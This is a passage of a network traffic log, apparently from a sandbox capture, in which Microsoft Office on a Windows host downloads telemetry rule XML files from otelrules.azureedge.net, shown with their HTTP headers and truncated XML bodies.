2024-10-28 18:12:38 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:38 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1364
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                            ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                            x-ms-request-id: 04ace5c9-101e-007a-5c26-26047e000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181238Z-r1755647c66qg7mpa8m0fzcvy000000006fg00000000ez9y
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:38 UTC | 1364 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
110 | 192.168.2.4 | 49863 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:38 UTC | 192 | OUT | GET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:38 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:38 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1391
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                            ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                            x-ms-request-id: c91d50fe-d01e-0049-5267-28e7dc000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181238Z-17fbfdc98bb7jfvg3dxcbz5xm000000003r0000000005sr2
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:38 UTC | 1391 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            111 | 192.168.2.4 | 49864 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:38 UTC | 192 | OUT | GET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:38 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:38 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1354
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                            ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                            x-ms-request-id: 8ce6a12a-601e-005c-62fe-26f06f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181238Z-17fbfdc98bbwj6cp6df5812g4s0000000710000000000r7d
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:38 UTC | 1354 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            112 | 192.168.2.4 | 49865 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:38 UTC | 192 | OUT | GET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:39 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:39 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                            ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                            x-ms-request-id: 19d379a2-b01e-0084-4b5b-28d736000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181239Z-17fbfdc98bbtwz55a8v24wfkdw00000006e000000000fcec
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:39 UTC | 1403 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            113 | 192.168.2.4 | 49866 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:39 UTC | 192 | OUT | GET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:39 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:39 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                            ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                            x-ms-request-id: 44c445c3-601e-003e-0f9c-273248000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181239Z-17fbfdc98bbfmg5wrf1ctcuuun00000005q000000000ft30
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:39 UTC | 1366 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            114 | 192.168.2.4 | 49867 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:39 UTC | 192 | OUT | GET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:39 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:39 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                            ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                            x-ms-request-id: 43b0bec6-701e-0050-4289-286767000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181239Z-17fbfdc98bb6vp4m3kc0kte9cs000000064g00000000bnv2
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:39 UTC | 1399 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            115 | 192.168.2.4 | 49868 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:39 UTC | 192 | OUT | GET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:39 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:39 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                            ETag: "0x8DC582BDF497570"
                                                                                                                                                                            x-ms-request-id: f459058d-801e-0015-12e0-25f97f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181239Z-r1755647c66tgwsmrrc4e69sk000000004sg000000001qm0
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:39 UTC | 1362 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
116 | 192.168.2.4 | 49869 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:39 UTC | 192 | OUT | GET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:39 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:39 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                            ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                            x-ms-request-id: 19ae2231-801e-007b-0d9c-27e7ab000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181239Z-17fbfdc98bb6kklk3r0qwaavtw000000039000000000etma
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:39 UTC | 1403 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


Session ID | Source IP | Source Port | Destination IP | Destination Port
117 | 192.168.2.4 | 49870 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:40 UTC | 192 | OUT | GET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:40 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:40 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                            ETag: "0x8DC582BEA414B16"
                                                                                                                                                                            x-ms-request-id: 68df6217-401e-0029-6d9c-279b43000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181240Z-17fbfdc98bbgnnfwq36myy7z0g000000062g000000001nhm
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:40 UTC | 1366 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


Session ID | Source IP | Source Port | Destination IP | Destination Port
118 | 192.168.2.4 | 49871 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:40 UTC | 192 | OUT | GET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:40 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:40 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                            ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                            x-ms-request-id: 54290c1c-d01e-008e-01bf-27387a000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181240Z-17fbfdc98bb8mkvjfkt54wa53800000003e0000000001g59
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:40 UTC | 1399 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


Session ID | Source IP | Source Port | Destination IP | Destination Port
119 | 192.168.2.4 | 49872 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:40 UTC | 192 | OUT | GET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:40 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:40 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                            ETag: "0x8DC582BEB256F43"
                                                                                                                                                                            x-ms-request-id: 989b5e1d-301e-003f-2bee-25266f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181240Z-r1755647c665dwkwce4e7gadz000000006800000000055se
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:40 UTC | 1362 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
120 | 192.168.2.4 | 49873 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:40 UTC | 192 | OUT | GET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:40 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:40 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                            ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                            x-ms-request-id: 30c340ab-b01e-0021-5eb4-26cab7000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181240Z-r1755647c66z67vn9nc21z11a800000004vg000000002vpw
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:40 UTC | 1403 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


Session ID | Source IP | Source Port | Destination IP | Destination Port
121 | 192.168.2.4 | 49874 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:40 UTC | 192 | OUT | GET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:40 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:40 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                            ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                            x-ms-request-id: 0ad7b348-901e-0067-0d67-28b5cb000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181240Z-r1755647c66vwt2b5wfzb6a204000000024g0000000048dk
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:40 UTC | 1366 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


Session ID | Source IP | Source Port | Destination IP | Destination Port
122 | 192.168.2.4 | 49875 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:40 UTC | 192 | OUT | GET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:41 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:40 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                            ETag: "0x8DC582BE976026E"
                                                                                                                                                                            x-ms-request-id: 338a3e6d-c01e-0079-709c-27e51a000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181240Z-17fbfdc98bbx59j5xd9kpbrs8400000004yg000000002cnv
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:41 UTC | 1399 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


Session ID | Source IP | Source Port | Destination IP | Destination Port
123 | 192.168.2.4 | 49876 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:41 UTC | 192 | OUT | GET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:41 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:41 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                            ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                            x-ms-request-id: 35d0191b-501e-0047-5a17-26ce6c000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181241Z-17fbfdc98bb5d4fn785en176rg00000005gg000000001n7q
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:41 UTC | 1362 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
124 | 192.168.2.4 | 49878 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:41 UTC | 192 | OUT | GET /rules/rule703400v0s19.xml HTTP/1.1
